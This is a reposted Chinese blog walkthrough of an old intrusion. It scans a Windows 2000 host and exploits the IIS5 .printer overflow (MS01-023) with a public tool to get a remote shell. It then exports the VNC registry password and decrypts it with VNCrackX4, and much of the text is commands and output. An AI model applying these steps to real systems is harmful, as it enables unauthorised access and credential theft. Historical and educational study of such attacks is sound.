這篇是在上網找資料時所看到的,應該很久了(2004 年 4 月之前的文章,可能出自資安論壇)。是透過 Windows 2000 的 IIS5 漏洞(MS01-023 Microsoft IIS5 IPP Buffer Overflow Vulnerability)入侵後再進行 VNC 密碼破解,雖然這個漏洞早就補起來了,但還是有參考的價值,就轉貼一下,原文如下:
現在那些漏洞也都很少見了,除非網管真的很懶= ="
一天,一個朋友的機器要我看看。好吧,正好有點時間。
下面是我的操作步驟!
1.首先,我拿起 nmap 一通亂砍,這不,一小會兒,就被我砍出了一大堆東東:
| [log]# nmap 192.168.4.41 Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ ) Interesting ports on (192.168.4.41): (The 1501 ports scanned but not shown below are in state: closed) Port State Service 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 21/tcp open ftp 25/tcp open smtp 27/tcp open nsw-fe 42/tcp open nameserver 53/tcp open domain 80/tcp open http 110/tcp open pop-3 119/tcp open nntp 135/tcp open loc-srv 143/tcp open imap4 389/tcp open ldap 443/tcp open https 445/tcp open microsoft-ds 563/tcp open snews 593/tcp open http-rpc-epmap 636/tcp open ldapssl 993/tcp open imaps 995/tcp open pop3s 1010/tcp open unknown 1068/tcp open instl_bootc 1083/tcp open ansoft-lm-1 1084/tcp open ansoft-lm-2 1433/tcp open ms-sql-s 2003/tcp open cfingerd 2004/tcp open mailbox 5631/tcp open pcanywheredata 5800/tcp open vnc 5900/tcp open vnc Nmap run completed -- 1 IP address (1 host up) scanned in 38 seconds [log]# |
上面顯示了一大堆東東,要一一講來,就太花時間了。我只講一下好玩的 VNC 。
早就聽說了 VNC 了,可是一直沒時間試試,今天正好趁這個機會來見見它的真面目。
於是去搜索了一下它的下載地址,很快便下了一個,壓縮包裡包括兩個部分:一個是服務端的安裝程序,另一部分是客戶端的應用程序。因為我是做為客戶端來連接朋友的機器,所以只需解壓一個客戶端的程序就可以用了,這個程序只有172KB,真可謂是短小精悍呀。
解壓完成,雙擊啟動,哈哈,只需填一個 IP 地址即可,太爽了!
可是………怎麼需要密碼呢。:<
這可怎麼辦?不會要我暴力破吧。我可不願做這樣的苦力。那就只好從別的地方下手了!
這樣子,這是台安裝了windows的機器,但從上面不知是什麼版本,那就讓我親自動手吧
| [log]#telnet 192.168.4.41 80 |
輸入 get abcd
這時 192.168.4.41 會返回如下的信息:
| HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Thu, 05 Jul 2001 07:02:41 GMT Content-Type: text/html Content-Length: 87 The parameter is incorrect. Connection to host lost. |
注意看了!返回的信息中包含一條:〞Microsoft-IIS/5.0〞
這基本上可以肯定就是 windows 2000 的服務器,http服務器是用的 IIS 5.0。注意:並不排除某個管理員有修改 banner 的癖好,反正我是沒有。
早就聽說 IIS 5.0 有一大堆的問題,而且有一個 .printer 的遠程溢出的嚴重漏洞,於是我又來到了我喜愛的搜索引擎 www.google.com ,哈哈,果不其然,很快就找到了 sunx 寫的破解程序,(註:寫一個漏洞破解程序,是我一直的夢想,但直到現在我基本上還是找一些現成的,不好意思)
這個程序的使用方法如下:
| D:\working\iis>iis5hack iis5 remote .printer overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, usage: iis5hack chinese edition: 0 chinese edition, sp1: 1 english edition: 2 english edition, sp1: 3 japanese edition: 4 japanese edition, sp1: 5 |
嗯,不錯,就讓我來try 一下。。。
| D:\working\iis>iis5hack 192.168.4.41 80 0 iis5 remote .printer overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, connecting... sending... Now you can telnet to 99 port good luck D:\working\iis>nc 192.168.4.41 99 Microsoft Windows 2000 [Version 5.00.2195] (C) 版權所有 1985-1998 Microsoft Corp. C:\WINNT\system32> |
哦,只一次就中標了,太爽了。
| C:\WINNT\system32>net user net user \\ 的用戶帳戶 ------------------------------------------------------------------------------- 123 Guest IUSR_YAWL IWAM_YAWL root TsInternetUser |
命令運行完畢,但發生一個或多個錯誤。
| C:\WINNT\system32>ipconfig ipconfig Windows 2000 IP Configuration Ethernet adapter 本地連接: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.4.41 Subnet Mask . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . : 192.168.0.1 C:\WINNT\system32> |
嗯,機器是完全控制了,這麼輕鬆也沒什麼意思。那就看看怎樣破 VNC 吧
又到網上搜索了一把,(網絡真是個好東西呀,要什麼有什麼),這不,一會兒找到一個號稱能破解 VNC 密碼的工具,打開說明一看:
VNCrackX4
破解VNC (Virtual Network Computing)密碼的工具
有兩種方法:
一、取得Registry值後的做法
取得\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password下的字串值(如: 2F 98 1D C5 48 E0 9E C2),在命令模式下執行「x4 -w」,接下來輸入一個碼後按一次回車……最後密碼就解出來了。
二、暴力法
用x4 -h target.host.com -w wordlist.txt暴力破解遠程主機的登錄密碼,不過這方法好像有限制?!
暴力法我是不想用的,又沒意思又費勁。
那就用第一種方法吧,可是怎樣得到這個註冊表的鍵值呢,好像有什麼辦法能導出,再讓我去網上找找吧!沒有網我是活不了了。
我繼續了以下的操作:(是在朋友的機器上面)
| D:\WINNT\system32>regedit /e abc.reg HKEY_CURRENT_USER\Software\ORL\WinVNC3 D:\WINNT\system32>type abc.reg Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\ORL\WinVNC3] "SocketConnect"=dword:00000001 "AutoPortSelect"=dword:00000001 "InputsEnabled"=dword:00000001 "LocalInputsDisabled"=dword:00000000 "QuerySetting"=dword:00000002 "QueryTimeout"=dword:0000000a "Password"=hex:78,a7,71,d1,a0,7d,28,f6 "PollUnderCursor"=dword:00000000 "PollForeground"=dword:00000001 "PollFullScreen"=dword:00000000 "OnlyPollConsole"=dword:00000001 "OnlyPollOnEvent"=dword:00000000 D:\WINNT\system32> |
哈哈,看到了沒???"Password"=hex:78,a7,71,d1,a0,7d,28,f6,這就是我夢寐以求的東東。
即然找到了所需要的東西,就讓我們開始無聊的破解吧。(以下操作是在我的機器上)
| D:\x4>x4 -W 78 a7 71 d1 a0 7d 28 f6 Entered HEX String: 78 a7 71 d1 a0 7d 28 f6 VNC Password: hehe |
嗯,密碼是 hehe ,一切就是這麼簡單。要注意大小寫的問題。
20090506
請先 登入 以發表留言。